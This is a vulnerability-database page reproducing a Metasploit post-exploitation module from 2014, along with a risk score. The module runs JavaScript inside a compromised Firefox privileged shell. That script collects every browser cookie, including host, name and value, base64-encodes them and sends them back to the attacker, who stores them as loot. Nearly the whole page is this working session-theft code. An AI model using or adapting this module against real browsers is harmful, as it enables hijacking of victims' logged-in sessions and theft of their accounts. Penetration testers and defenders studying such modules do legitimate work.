Firefox Gather Cookies from Privileged Javascript Shell

🗓️ 26 Mar 2014 18:49:53Reported by joev <[email protected]>Type

Firefox Gather Cookies from Privileged Javascript Shell. Collects cookies from Firefox Javascript Shel

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'json'

class MetasploitModule < Msf::Post
  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Firefox Gather Cookies from Privileged Javascript Shell',
        'Description' => %q{
          This module allows collection of cookies from a Firefox Privileged Javascript Shell.
        },
        'License' => MSF_LICENSE,
        'Author' => [ 'joev' ],
        'DisclosureDate' => '2014-03-26'
      )
    )

    register_options([
      OptInt.new('TIMEOUT', [true, 'Maximum time (seconds) to wait for a response', 90])
    ])
  end

  def run
    results = js_exec(js_payload)
    if results.present?
      begin
        cookies = JSON.parse(results)
        cookies.each do |entry|
          entry.each_key { |k| entry[k] = Rex::Text.decode_base64(entry[k]) }
        end

        file = store_loot('firefox.cookies.json', 'text/json', rhost, results)
        print_good("Saved #{cookies.length} cookies to #{file}")
      rescue JSON::ParserError => e
        print_warning(results)
      end
    end
  end

  def js_payload
    %|
      (function(send){
        try {
          var b64 = Components.utils.import("resource://gre/modules/Services.jsm").btoa;
          var cookieManager = Components.classes["@mozilla.org/cookiemanager;1"]
                        .getService(Components.interfaces.nsICookieManager);
          var cookies = [];
          var iter = cookieManager.enumerator;
          while (iter.hasMoreElements()){
            var cookie = iter.getNext();
            if (cookie instanceof Components.interfaces.nsICookie){
              cookies.push({host:b64(cookie.host), name:b64(cookie.name), value:b64(cookie.value)})
            }
          }
          send(JSON.stringify(cookies));
        } catch (e) {
          send(e);
        }
      })(this.send);
    |.strip
  end
end

08 Feb 2023 13:47Current

0.9Low risk

Vulners AI Score0.9